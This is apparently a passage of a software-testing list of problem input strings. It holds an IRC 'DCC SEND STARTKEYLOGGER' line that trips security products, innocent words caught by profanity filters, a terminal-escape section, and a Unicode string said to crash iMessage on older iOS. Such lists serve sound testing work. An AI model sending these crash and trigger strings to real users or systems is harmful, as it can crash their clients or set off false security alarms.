593. # Strings that may occur on IRC clients that make security products freak out
594.  
595. DCC SEND STARTKEYLOGGER 0 0 0
596.  
597. # Scunthorpe Problem
598. #
599. # Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)
600.  
601. Scunthorpe General Hospital
602. Penistone Community Church
603. Lightwater Country Park
604. Jimmy Clitheroe
605. Horniman Museum
606. shitake mushrooms
607. RomansInSussex.co.uk
608. http://www.cum.qc.ca/
609. Craig Cockburn, Software Specialist
610. Linda Callahan
611. Dr. Herman I. Libshitz
612. magna cum laude
613. Super Bowl XXX
614. medieval erection of parapets
615. evaluate
616. mocha
617. expression
618. Arsenal canal
619. classic
620. Tyson Gay
621. basement
622.  
623. # Human injection
624. #
625. # Strings which may cause human to reinterpret worldview
626.  
627. If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.
628.  
629. # Terminal escape codes
630. #
631. # Strings which punish the fools who use cat/type on this file
632.  
633. Roses are red, violets are blue. Hope you enjoy terminal hue
634. But now...for my greatest trick...
635. The quick brown fox... [Beeeep]
636.  
637. # iOS Vulnerability
638. #
639. # Strings which crashed iMessage in iOS versions 8.3 and earlier
640.  
641. Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗